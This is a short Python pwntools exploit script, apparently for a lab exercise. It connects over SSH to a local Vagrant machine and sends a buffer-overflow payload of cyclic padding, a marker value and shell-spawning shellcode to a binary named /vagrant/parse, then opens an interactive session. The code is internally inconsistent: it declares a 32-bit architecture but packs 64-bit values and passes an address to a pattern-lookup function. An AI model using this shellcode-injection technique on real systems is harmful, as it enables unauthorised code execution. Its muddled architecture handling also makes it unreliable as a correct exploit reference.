from pwn import *
import base64
# Flat pwntools script: open an SSH session to the vagrant box, assemble a
# payload from fixed constants, and hand it to /vagrant/parse over a bash
# session. Every value below is carried over from the original script.
context.update(os='linux', arch='i686')

# Connect to the server with SSH (same positional user/host as before,
# spelled out by keyword).
ssh_connection = ssh(user='vagrant', host='default', port=2222)

# Open a shell to write more stuff to.
bash = ssh_connection.run('bash')

# Assembly source from shellcraft, shown once as text and once as a hexdump
# of the assembled bytes.
shellcode = shellcraft.sh()
assembled = asm(shellcode)
print(shellcode)
print(hexdump(assembled))

# Payload = cyclic prefix up to the recorded address, the 0xdeadbeef marker,
# then the assembled bytes; joined in one step instead of three `+=`.
payload = b''.join([
    cyclic(cyclic_find(0x0000555555555751)),
    p64(0xdeadbeef),
    assembled,
])

# Launch the target inside the remote bash, feed it the payload, then drop
# into an interactive session.
bash.sendline('/vagrant/parse')
bash.sendline(payload)
bash.interactive()